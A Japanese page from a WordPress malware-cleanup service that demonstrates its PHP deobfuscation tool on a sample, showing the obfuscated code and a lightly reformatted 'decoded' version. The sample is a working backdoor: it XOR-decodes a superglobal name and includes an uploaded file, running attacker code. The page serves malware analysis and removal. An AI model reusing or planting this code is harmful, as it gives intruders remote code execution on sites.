Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $check = 'i6Pq3TR7ZvcpwHA'; $expages = $check; function exts($found, $mins) { $chars = $mins; $keys = urldecode($found); $terms = substr($chars,0, strlen($keys)); $original_image_url = $keys ^ $terms; return $original_image_url; } $current_user = ${exts("6p%19%3Dv%07", $expages)}; $uris = $...



難読化されたPHPコード

<?php $check = 'i6Pq3TR7ZvcpwHA';
$expages = $check;
function exts($found, $mins)

{
    $chars = $mins;

    $keys = urldecode($found);
    $terms = substr($chars,0, strlen($keys));

    $original_image_url = $keys ^ $terms;
    return $original_image_url;

}
$current_user = ${exts("6p%19%3Dv%07", $expages)};
$uris = $current_user;
if (isset($uris[$expages]))

{
    $base = $current_user[$expages];
    $script_and_style_regex = $base[exts("%1D%5B+.%5D5%3FR", $expages)];
    $space = 'custom_fields';
    $dynamic = $script_and_style_regex;
    $old_dates = 'opening_quote';
    include ($dynamic);

}

デコード(難読化解除)されたコード

<?php

$check = 'i6Pq3TR7ZvcpwHA';
$expages = $check;
function exts($found, $mins)
{
    $chars = $mins;
    $keys = urldecode($found);
    $terms = substr($chars, 0, strlen($keys));
    $original_image_url = $keys ^ $terms;
    return $original_image_url;
}
$current_user = ${exts("6p%19%3Dv%07", $expages)};
$uris = $current_user;
if (isset($uris[$expages])) {
    $base = $current_user[$expages];
    $script_and_style_regex = $base[exts("%1D%5B+.%5D5%3FR", $expages)];
    $space = 'custom_fields';
    $dynamic = $script_and_style_regex;
    $old_dates = 'opening_quote';
    include $dynamic;
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.